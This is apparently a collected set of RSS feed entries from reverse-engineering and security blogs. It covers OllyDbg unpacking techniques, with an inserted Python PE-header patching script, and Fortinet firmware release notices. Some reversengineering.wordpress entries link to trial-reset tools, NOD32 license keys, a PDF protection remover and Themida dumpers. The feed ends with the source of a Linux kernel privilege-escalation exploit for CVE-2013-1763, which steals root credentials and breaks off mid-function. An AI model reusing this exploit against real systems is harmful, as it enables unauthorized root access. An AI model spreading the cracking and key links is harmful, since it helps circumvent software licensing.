    cmp     byte ptr [ecx+eax], 0
    jnz     short loc_9C
    cmp     [ebp+var_4], eax
    jb      short loc_2A
    mov     eax, 0FFFFh
    jmp     short loc_C0
; -----------------------------------------------------------------------
    mov     eax, 514Ah
    mul     dword ptr [ebp-8]
    mov     [ebp-10h], eax
    mov     eax, [ebp-10h]
    mov     [ebp-8], eax
loc_C0:                                 ; CODE XREF: sub_0+70j ; sub_0+ADj
    pop     edi
    pop     esi
    pop     ebx
    leave
    retn
sub_0 endp

And here's the raw byte-code for the function above:

5589E583EC105356578B750CC745F89D257A698175F82C180000FF0594C04200
8365F4008365FC00EB6A31DB8145F8A53A0000FF0594C0420031FFEB448B45FC
01F88B55080FBE04020FBE143E39D075014389F183C8FF40803C010075F939C3
7510FF45F48B45103945F475058B45FCEB4EB8C9430000F765F88945F08945F8
4789F183C8FF40803C010075F939C772ACFF45FC8B450889C183C8FF40803C01
0075F93945FC7282B8FFFF0000EB11B84A510000F765F88945F08B45F08945F8
5F5E5BC9C3

==> Virus Bulletin 2006

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I bought my plane ticket a few hours ago for Virus Bulletin 2006. I'm looking forward to rubbing elbows with other virus analysts and discussing the latest and greatest reverse engineering tools and methods. If you're going to VB'06 as well, send me an e-mail or find me in person and mention my blog and I'll buy you a beer (which shouldn't be too hard seeing as how the conference will be in Montreal)!

==> Unpacking DLLs and Drivers with OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx People often ask me how to unpack DLLs and drivers. A common assumption is that it is necessary to use OllyDbg's LOADDLL for unpacking DLLs and that a ring-0 debugger such as SoftICE or WinDbg is necessary for unpacking drivers. With a little tweaking, we can use regular OllyDbg to unpack packed DLLs and even many packed drivers. I don't know about you, but I've always had problems with LOADDLL. Even though it's well documented in OllyDbg's help file (the source is even included in the help file), I'd rather not use it if I don't have to. So how can we load a DLL into OllyDbg so that we can unpack it like we would a normal EXE? All that you need to do is set the IMAGE_FILE_DLL bit to zero in the Characteristics field of the PE's IMAGE_FILE_HEADER structure. You could use a hex editor to make this change, but it's easier with a PE editor like LordPE. Once this flag is zeroed out, you can load the "DLL" into OllyDbg, and OllyDbg and the OS will interpret it as an EXE. You can then unpack it as you would an EXE (trace to the OEP, dump, fix the imports, etc.), and then set the IMAGE_FILE_DLL bit back to one in the unpacked file. The only catch is that many unpacking stubs check to see if [EBP+0x0C] == 1 (does the fdwReason argument to DllMain equal DLL_PROCESS_ATTACH), and if it doesn't equal 1 then it won't continue to unpack itself. You can fix this problem by looking for this comparison and forcing a jump/no-jump, or by manually pushing three DWORDs onto the stack (before executing the first instruction at the EP), the second of which should be 1. We can use the same PE header patching trick for loading drivers into OllyDbg for unpacking purposes. By setting the Subsystem field to 2 (IMAGE_SUBSYSTEM_WINDOWS_GUI) in the PE's IMAGE_OPTIONAL_HEADER, OllyDbg and the OS will interpret the file as an EXE instead of as a driver.
This allows us to trace through the unpacking stub until the code and data are unpacked, and we can dump the process when we find the OEP. Of course if the unpacking stub is trying to execute instructions/functions that need to be executed from ring-0 then we won't be able to unpack it like this. However, if the unpacking stub is just doing a lot of simple XORing to unpack the original code and data, then we should be able to use this trick to successfully unpack the driver with OllyDbg.
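The header edits from this post and from "Loading Drivers in OllyDbg" (clear IMAGE_FILE_DLL, rewrite Subsystem) are two 16-bit fields, and the "Elevation of Privilege DLL Patcher" post's entrypoint redirection starts from a third, AddressOfEntryPoint. The script below is an added example, not the blog's patcher or any LordPE feature: it locates those fields by walking the DOS header, PE signature and COFF header, applies whichever tweak the image needs, and can restore the DLL flag after a dump. The minimal PE header it builds for its own test is constructed here and is not loadable; pointing the script at a real DLL or .sys file applies the same edits to that file. Adding NTDLL.DLL to a driver's import table, the other half of the driver trick, is not something a header-only patch can do.

```python
"""PE-header tweaks for loading a DLL or driver into OllyDbg as if it were an EXE.
Added example, not the blog's tool; works offline on a constructed minimal header."""
import struct

IMAGE_FILE_DLL = 0x2000               # IMAGE_FILE_HEADER.Characteristics bit
IMAGE_SUBSYSTEM_NATIVE = 1            # what drivers carry
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2       # what the OS and OllyDbg will start as a process
COFF_HEADER_SIZE = 20


def _pe_offset(data):
    """Offset of the 'PE\\0\\0' signature, via e_lfanew at 0x3C in the DOS header."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return e_lfanew


def _offsets(data):
    """File offsets of the three fields the posts care about. AddressOfEntryPoint
    and Subsystem sit at the same offsets in PE32 and PE32+ optional headers."""
    coff = _pe_offset(data) + 4
    opt = coff + COFF_HEADER_SIZE
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unexpected optional header magic 0x%X" % magic)
    return {"characteristics": coff + 18, "entrypoint": opt + 16, "subsystem": opt + 68}


def get_characteristics(data):
    return struct.unpack_from("<H", data, _offsets(data)["characteristics"])[0]


def get_subsystem(data):
    return struct.unpack_from("<H", data, _offsets(data)["subsystem"])[0]


def get_entrypoint(data):
    """RVA of the entrypoint (DllMain for a DLL, DriverEntry for a driver); this is
    the field an entrypoint-redirecting patcher rewrites."""
    return struct.unpack_from("<I", data, _offsets(data)["entrypoint"])[0]


def _patch(data, fmt, offset, value):
    out = bytearray(data)
    struct.pack_into(fmt, out, offset, value)
    return bytes(out)


def set_dll_flag(data, enabled):
    """Clear IMAGE_FILE_DLL to debug a DLL as an EXE; set it again after dumping."""
    flags = get_characteristics(data)
    flags = flags | IMAGE_FILE_DLL if enabled else flags & ~IMAGE_FILE_DLL & 0xFFFF
    return _patch(data, "<H", _offsets(data)["characteristics"], flags)


def set_subsystem(data, subsystem):
    """Drivers carry IMAGE_SUBSYSTEM_NATIVE; rewriting it to WINDOWS_GUI lets the
    loader (and OllyDbg) start the file as a user-mode process."""
    return _patch(data, "<H", _offsets(data)["subsystem"], subsystem)


def prepare_for_ollydbg(data):
    """Apply whichever tweak the image needs and report what was changed."""
    changed = []
    if get_characteristics(data) & IMAGE_FILE_DLL:
        data = set_dll_flag(data, False)
        changed.append("cleared IMAGE_FILE_DLL")
    if get_subsystem(data) == IMAGE_SUBSYSTEM_NATIVE:
        data = set_subsystem(data, IMAGE_SUBSYSTEM_WINDOWS_GUI)
        changed.append("subsystem NATIVE -> WINDOWS_GUI")
    return data, changed


def build_minimal_header(characteristics, subsystem, entrypoint=0x1000):
    """Constructed sample: DOS header, PE signature, COFF header and an otherwise
    empty PE32 optional header. Not loadable, but accurate for the fields above."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, characteristics)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)               # PE32 magic
    struct.pack_into("<I", opt, 16, entrypoint)          # AddressOfEntryPoint
    struct.pack_into("<H", opt, 68, subsystem)           # Subsystem
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        patched, what = prepare_for_ollydbg(f.read())
    with open(sys.argv[1] + ".olly", "wb") as f:
        f.write(patched)
    print(", ".join(what) or "nothing to change", "| entrypoint RVA 0x%X" % get_entrypoint(patched))
```

The patched copy is written next to the original with an .olly suffix so the original stays intact for the final "set IMAGE_FILE_DLL back to one" step on the dumped file. Nothing here touches the PE checksum; the loader ignores it for ordinary user-mode images, which is all OllyDbg needs.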

==> FortiAuthenticator 2.1.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiAuthenticator 2.1.0 B0065 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FAC_200D, FAC_400C, FAC_1000C, FAC_3000B, FAC_VM.

==> FortiRecorder 1.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiRecorder 1.2.0 B0155 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following model: FRC_200D.

==> FortiMail 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiMail 5.0.0 B0107 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FE_100C, FE_2000A, FE_2000B, FE_200D, FE_3000C, FE_3000D, FE_4000, FE_400B, FE_400C, FE_5001A, FE_5002B, FE_VM.

==> FortiOS 4.3.12

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.12 B0656 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following model: FGT_VM64_XEN.

==> FortiOS 4.2.15

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.2.15 B0356 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FGT_30B, FK_3810A, FK_5001A, FGT_50B, FGT_51B, FGT_60B, FGT_80C, FGT_80CM, FGT_82C, FGT_100A, FGT_200A, FGT_110C, FGT_111C, FGT_200B, FGT_224B, FGT_300A, FGT_310B, FGT_310B_DC, FGT_311B, FGT_400A, FGT_500A, FGT_620B, FGT_620B_DC, FGT_800, FGT_800F, FGT_1000A, FGT_1000AFA2, FGT_1000A_LENC, FGT_3016B, FGT_3600A, FGT_3810A, FGT_5001, FGT_5001A, FGT_5001FA2, FGT_5005FA2, FOC_3810A, FOC_5001, FOC_5001A, FOC_5001FA2, FOC_5005FA2, FWF_30B, FWF_50B, FWF_60B, FWF_80CM, FWF_81CM, FGT_1240B, FGT_3600, FGT_200B_POE, FGT_ONE, FGT_60C, FGT_3950B, FGT_3951B, FGT_3040B, FGT_621B, FK_3950B, FK_3951B, FWF_60C, FGT_VM, FGT_621B_DC, FGT_5001B, FGT_3140B, FWF_60CM, FK_5001B, FWF_60CX_A, FGT_3950B_LENC, FGT_200B_LENC, FGT_300C.

==> FortiManager 4.3.7

http://pub.kb.fortinet.com/rss/firmware.xml FortiManager 4.3.7 B0700 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FMG_100, FMG_100C, FMG_400A, FMG_400B, FMG_1000C, FMG_3000, FMG_3000B, FMG_3000C, FMG_5001A, FMG_VM32, FMG_400C, FMG_VM64, FMG_200D.

==> FortiCache 2.2.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.2.1 B0225 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FCH1KC, FCH3KC, FCH4HC.

==> FortiDNS 1.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiDNS 1.2.0 B#### and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FNS_400C, FNS_1000C, FNS_VM.

==> FortiDDoS 3.1.5

http://pub.kb.fortinet.com/rss/firmware.xml FortiDDoS 3.1.5 B7 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FDD_100A, FDD_200A, FDD_300A.

==> FortiOS 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.1 B0147 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FGT_60D, FWF_60D.

==> FortiWeb 4.4.6

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.6 B0678 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FWB_400B, FWB_400C, FWB_1000B, FWB_1000C, FWB_3000C, FWB_3000CFSX, FWB_4000C, FWB_VM-64bit.

==> FortiOS 4.3.12

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.12 B0656 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FGT_800, FGT_3600, FGT_300A, FGT_100A, FGT_200A, FGT_400A, FGT_500A, FGT_800F, FGT_5001FA2, FGT_1000A, FGT_5001, FGT_5005, FGT_3810A, FGT_50B, FWF_50B, FGT_3016B, FGT_310B, FGT_30B, FGT_5005FA2, FGT_224B, FWF_60B, FGT_60B, FGT_1000AFA2, FGT_1000A_LENC, FGT_3600A, FGT_5002FB2, FGT_5001A, FGT_620B, FOC_5001, FOC_5005FA2, FOC_3810A, FGT_110C, FOC_WF_60B, FGT_111C, FGT_51B, FGT_80C, FWF_80CM, FGT_311B, FWF_30B, FGT_82C, FWF_81CM, FGT_ONE, FGT_1240B, FGT_3950B, FGT_3951B, FOC_60B, FOC_5001A, FOC_5001FA2, FGT_80CM, FGT_200B, FGT_200B_POE, FGT_310B_DC, FGT_620B_DC, FWF_60C, FOC_3950B, FOC_3951B, FGT_3040B, FGT_621B, FGT_3140B, FGT_5001B, FGT_60C, FGT_VM32, FK_3810A, FK_5001A, FK_3950B, FK_3951B, FSW_5203B, FWF_60CX_A, FWF_60CM, FGT_300C, FOC_80C, FOC_5001B, FK_5001B, FGT_VM64, FGT_600C, FGT_1000C, FGT_40C, FWF_40C, FGT_20C, FWF_20C, FGT_100D, FGT_3240C, FGT_3140B_LENC, FGT_3140B_DC, FGT_3040B_LENC, FGT_3040B_DC, FGT_800C, FGT_60C_POE, FGT_20C_ADSL_A, FWF_20C_ADSL_A.

==> FortiVoiceOS 2.1.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoiceOS 2.1.0 B0131 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FVC_200D, FVC_200D_T.

==> FortiManager 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiManager 5.0.1 B0121 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FMG_1000C, FMG_100C, FMG_3000B, FMG_3000C, FMG_400B, FMG_400C, FMG_5001A, FMG_VM32, FMG_VM64, FMG_200D.

==> FortiSwitch 4.3.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiSwitch 4.3.4 B0138 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FS_5003B, FS_5003A.

==> FortiClient 4.2.8

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 4.2.8 B0307 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: Windows_x64, Windows_x86.

==> FortiRecorder 1.1.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiRecorder 1.1.0 B0117 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following model: FRC_200D.

==> FortiSwitch 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiSwitch 5.0.0 B0005 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FS_5003A, FS_5003B, FCTL_5103B.

==> FortiOS 4.2.14

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.2.14 B0353 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FGT_30B, FK_3810A, FK_5001A, FGT_50B, FGT_51B, FGT_60B, FGT_80C, FGT_80CM, FGT_82C, FGT_100A, FGT_200A, FGT_110C, FGT_111C, FGT_200B, FGT_224B, FGT_300A, FGT_310B, FGT_310B_DC, FGT_311B, FGT_400A, FGT_500A, FGT_620B, FGT_620B_DC, FGT_800, FGT_800F, FGT_1000A, FGT_1000AFA2, FGT_1000A_LENC, FGT_3016B, FGT_3600A, FGT_3810A, FGT_5001, FGT_5001A, FGT_5001FA2, FGT_5005FA2, FOC_3810A, FOC_5001, FOC_5001A, FOC_5001FA2, FOC_5005FA2, FWF_30B, FWF_50B, FWF_60B, FWF_80CM, FWF_81CM, FGT_1240B, FGT_3600, FGT_200B_POE, FGT_ONE, FGT_60C, FGT_3950B, FGT_3951B, FGT_3040B, FGT_621B, FK_3950B, FK_3951B, FWF_60C, FGT_VM, FGT_621B_DC, FGT_5001B, FGT_3140B, FWF_60CM, FK_5001B, FWF_60CX_A, FGT_3950B_LENC, FGT_200B_LENC, FGT_300C.

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B007 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FVC_40, FVC_70, FVC_100.

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B006 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FVC_40, FVC_70, FVC_100.

==> FortiWeb 4.4.5

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.5 B0673 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: FWB_400B, FWB_400C, FWB_1000B, FWB_1000C, FWB_3000C, FWB_3000CFSX, FWB_4000C, FWB_VM-64bit.

==> FortiClient Mac 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Mac 5.0.1 B0082 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following model: MacOS.

==> FortiClient 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 5.0.1 B0194 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: Windows_x64, Windows_x86.

==> FortiAP 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiAP 5.0.1 B0024 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAP_210B, FAP_220B, FAP_221B, * FAP_222B, FAP_112B, FAP_320B, * FAP_223B, FAP_11C

==> FortiOS 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.1 B0147 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_40C, FGT_60C, FGT_80C, * FGT_80CM, FGT_110C, FGT_111C, * FGT_200B, FGT_200B_POE, FGT_300C, * FGT_310B, FGT_311B, FGT_620B, * FGT_620B_DC, FGT_621B, FGT_1240B, * FGT_3016B, FGT_3040B, FGT_3140B, * FGT_3810A, FGT_3950B, FGT_3951B, * FGT_5001A, FGT_5001B, FGT_VM32, * FGT_VM64, FWF_40C, FWF_60C, * FWF_60CM, FWF_60CX_A, FWF_80CM, * FWF_81CM, FGT_310B_DC, FGT_3040B_DC, * FGT_3040B_LENC, FGT_3140B_LENC, FGT_3140B_DC, * FGT_800C, FGT_1000C, FGT_100D, * FGT_5101C, FGT_600C, FSW_5203B, * FWF_20C, FGT_20C, FGT_60C_POE, * FGT_20C_ADSL_A, FWF_20C_ADSL_A, FGT_3240C,

==> FortiMail 4.3.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiMail 4.3.4 B0528 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FE_100, FE_100C, FE_400, * FE_400B, FE_400C, FE_2000, * FE_2000A, FE_2000B, FE_3000C, * FE_3000C_LENC, FE_4000, FE_5001A, * FE_5002B, FE_VM, FE_200D,

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B005 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiAnalyzer 4.3.6

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 4.3.6 B0691 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FLG_100B, FLG_100C, FLG_400B, * FLG_800, FLG_800B, FLG_1000B, * FLG_1000C, FLG_2000, FLG_2000A, * FLG_2000B, FLG_4000, FLG_4000A, * FLG_4000B, FLG_VM32, FLG_400C, * FLG_VM64, FLG_200D

==> History of memory corruption vulnerabilities and exploits

http://rdist.root.org/feed/ I came across a great paper, “Memory Errors: The Past, the Present, and the Future” by van der Veen et al. The authors cover the history of memory corruption errors as well as exploitation and countermeasures. I think there are a number of interesting conclusions to draw from it. It seems that the number of [...]

==> Has HTML5 made us more secure?

http://rdist.root.org/feed/ Brad Hill recently wrote an article claiming that HTML5 has made us more secure, not less. His essential claim is that over the last 10 years, browsers have become more secure. He compares IE6, ActiveX, and Flash in 2002 (when he started in infosec) with HTML5 in order to make this point. While I think [...]

==> Toggl time-tracking service failures

http://rdist.root.org/feed/ A while ago, we investigated using various time-tracking services. Making this quick and easy for employees is helpful in a consulting company. Our experience with one service should serve as a cautionary note for web 2.0 companies that want to sell to businesses. Time tracking is a service that seems both boring and easy to [...]

==> Cyber-weapon authors catch up on blog reading

http://rdist.root.org/feed/ One of the more popular posts on this blog was the one pointing out how Stuxnet was unsophisticated. Its use of traditional malware methods and lack of protection for the payload indicated that the authors were either “Team B” or in a big hurry. The post was intended to counteract the breathless praise in the [...]

==> RSA repeats earlier claims, but louder

http://rdist.root.org/feed/ Sam Curry of RSA was nice enough to respond to my post. Here’s a few points that jumped out at me from what he wrote: RSA is in the process of fixing the downgrade attack that allows an attacker to choose PKCS #1 v1.5, even if the key was generated by a user who selected [...]

==> Why RSA is misleading about SecurID vulnerability

http://rdist.root.org/feed/ There’s an extensive rebuttal RSA wrote in response to a paper showing that their SecurID 800 token has a crypto vulnerability. It’s interesting how RSA’s response walks around the research without directly addressing it. A perfectly accurate (but inflammatory) headline could also have been “RSA’s RSA Implementation Contained Security Flaw Known Since 1998“. The research [...]

==> OllyDbg 2.00.01 (Final)

http://reversengineering.wordpress.com/feed/ OllyDbg 2.0 is a 32-bit assembler-level analyzing debugger with an intuitive interface. It is especially useful if source code is not available or when you experience problems with your compiler. Requirements. Developed and tested mainly under Windows 2000 and Windows XP, but should work under any Windows version: 95, 98, ME, NT, 2000, XP, 2003 Server, [...]

==> PROTECTiON iD 6.4.0

http://reversengineering.wordpress.com/feed/ Features: - detection of every major PC ISO Game / Application protection - currently covers 475 detections, including win32/64 exe protectors & packers, .net protectors, dongles, licenses & installers - sector scanning CDs / DVDs for Copy Protections - files / folders can simply be dragged & dropped into pid - strong scanning routines allowing [...]

==> StrongOD 0.3.4.639

http://reversengineering.wordpress.com/feed/ Make your OllyDbg Strong! This plug-in provides three kinds of ways to initiate the process: 1, Normal – And the same manner as the original start, the STARTUPINFO inside unclean data 2, CreateAsUser – User with a mandate to initiate the process of the user, so that the process running under the purview of the [...]

==> Broken links ! Links that do not work

http://reversengineering.wordpress.com/feed/ Hi dear friends, tell me about broken links in this post. I will find them on my system and after that I will try [...]

==> Trial Reset 4 Final

http://reversengineering.wordpress.com/feed/ Trial Reset 4 Final Tnx fly to his programmer http://rapidshare.com/files/409095074/Trial-Reset40Final.zip http://reversengineering.files.wordpress.com/2010/07/trial-reset40final-zip.jpg you know what to do;) Filed under: OTHER, TOOLS

==> The newest NOD32 keys with MVGM NOD32 Licence v1.0

http://reversengineering.wordpress.com/feed/ HI The newest NOD32 keys with MVGM NOD32 Licence v1.0 NOD32 [...]

==> TrialReset 4.0 Final (Public)

http://reversengineering.wordpress.com/feed/ Hi to all, I am here again. Thank you for your support. The small program for removing the trial of apps. Works with all the widespread systems of protection. The interface is very simple: [...]

==> ODDragAttach 1.1

http://reversengineering.wordpress.com/feed/ Author Exile Description Choice is, it will add the window corresponding to the process of src and bin. Window, the process of selection, OD automatically minimize the window, select the target window, then maximize the window, OD. Note: Some versions of the OD program may cover an open button, can be changed according [...]

==> Attach Extended 0.1

http://reversengineering.wordpress.com/feed/ This is a really small plugin that I have written for improving attach feature of OllyDbg. With this plugin, you can attach to process by identifying its PID directly, not only selecting process list. In addition, you can find PID of process by dragging a small cursor on each window (This can be used on [...]

==> Mapimp 0.4

http://reversengineering.wordpress.com/feed/ Author: takerZ. Description: This is an open source OllyDbg plugin which will help you to import map files exported by IDA or Dede. There are many plugins using which you can perform similar actions, but mapimp: - Recognizes debugged file segments and applies names correctly - Has an option to overwrite or skip [...]

==> Obsidium 1.4.x.x OEP Finder + IAT Repair v0.1

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/7203.a79ca10d2342f1b32333add72/Obsidium_1.4.x.x_OEP_Finder___IAT_Repair_v0.1.txt.html Author Pavka Posted in Scripts, TOOLS

==> MUltimate Assembler 1.2

http://reversengineering.wordpress.com/feed/ Author: RaMMicHaeL. A multi-line (dis)assembler tool, perfect for writing code caves. It supports: - labels and data (C-style string) - external jumps and calls. http://letitbit.net/download/6671.c63ed09074b57c49b4cd2067e/MUltimate_Assembler_v1.2.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> VMProtect 1.7 – 1.8 OEP Finder + Unpack Helper v1.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/2516.25addf1167522eb8602b67146/VMProtect_1.7___1.8_OEP_Finder___Unpack_Helper_v1.0.txt.html by LCF-AT Posted in Scripts, TOOLS

==> CodeDoctor 0.90

http://reversengineering.wordpress.com/feed/ Functions:
1) Deobfuscate
Select instructions in the disasm window and execute this command. It will try to clear the code from junk instructions.
Example:
Original:
00874372 57            PUSH EDI
00874373 BF 352AAF6A   MOV EDI,6AAF2A35
00874378 81E7 0D152A41 AND EDI,412A150D
0087437E 81F7 01002A40 XOR EDI,402A0001
00874384 01FB          ADD EBX,EDI
00874386 5F            POP EDI
Deobfuscated:
00874372 83C3 04 [...]

==> Themida + WinLicense 1.1.0.0 – 2.1.0.0 Dumper + IAT Repair + CodeEncrypt Repair v2.6.0

http://reversengineering.wordpress.com/feed/ by Quosego http://letitbit.net/download/5120.c5ff8c01bf87b5594de7f4fbc/Themida___WinLicense_1.1.0.0___2.1.0.0_Dumper___IAT_Repair___CodeEncrypt_Repair_v2.6.0.txt.html Posted in Scripts, TOOLS

==> Scripad 1.0 + ODBGScript 1.77.3

http://reversengineering.wordpress.com/feed/ ODbgScript is a plugin for OllyDbg, which is, in our opinion, the best application-mode debugger out there. One of the best features of this debugger is the plugin architecture which allows users to extend its functionality. ODbgScript is a plugin meant to let you automate OllyDbg by writing scripts in an assembly-like language. Many tasks [...]

==> StrongOD 0.2.6.415

http://reversengineering.wordpress.com/feed/ This will be a separate download of StrongOD as of version 0.2.4.350 because – as strange as it sounds – the developer has protected it! This plugin will now require a key for it to run and be used. You can obtain a valid key by emailing: StrongODsafengine.com http://letitbit.net/download/9563.9f5459d00eca80b4993740279/StrongOD_v0.2.6.415.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> PDF Protection Remover 3.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/8140.813d385e39b7bcbb34ccc58af/PDF_Protection_Remover_3.0___Patch_DJiNN.rar.html pass :www.2baksa.net Posted in TOOLS, Uncategorized

==> HOlly 0.2 Build 81

http://reversengineering.wordpress.com/feed/ This is my OllyDbg mod named HOlly. I will be constantly adding features as I require them or they are requested. Currently it only has a multiline assembler that needs some work but I would like some input. So if I could get some input on the following that would be great. http://letitbit.net/download/3997.d3730400452d29f3a615da1f7/HOlly_v0.2_Build_81.rar.html Posted in [...]

==> Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0

http://reversengineering.wordpress.com/feed/ Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0 By [SND]quosego Hi all, It’s time to make a final stand. Oreans it’s your turn now. This package includes the following; WL.&.TM.VM.dumper.&.IAT.CodeEnc.Fixer.v2.6.0-SnD A script to unpack all known versions of Winlicense and Themida using any options. The script will unpack all known Themida and Winlicense applications using virtual machine antidump on Windows XP. [...]

==> Linux Kernel 3.x Privilege Escalation Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss
/*
 * quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
 * bug found by Spender
 * poc by SynQ
 *
 * hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
 * using nl_table->hash.rehash_time, index 81
 *
 * Fedora 18 support added
 *
 * 2/2013
 */

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

/* kernel function pointer types; the kernel is built with regparm(3) on i686 */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3))) kernel_code()
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

int jump_payload_not_used(void *skb, void *nlh)
{
    asm volatile (
        "mov $kernel_code, %eax\n"
        "call *%eax\n"
    );
}

/* resolve a kernel symbol address from /proc/kallsyms (readable on Fedora 18) */
unsigned long get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy, sym[512];
    int ret = 0;

    f = fopen("/proc/kallsyms", "r");
    if (!f) {
        return 0;
    }

    while (ret != EOF) {
        ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
        if (ret == 0) {
            fscanf(f, "%s\n", sym);
            continue;
        }
        if (!strcmp(name, sym)) {
            printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);
    return 0;
}

int main(int argc, char *argv[])
{
    int fd;
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
    char buf[8192];

    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0) {
        printf("Can't create sock diag socket\n");
        return -1;
    }

    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;
    //req.r.sdiag_family = 89;
    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

    if (argc == 1) {
        printf("Run: %s Fedora|Ubuntu\n", argv[0]);
        return 0;
    }
    else if (strcmp(argv[1], "Fedora") == 0) {
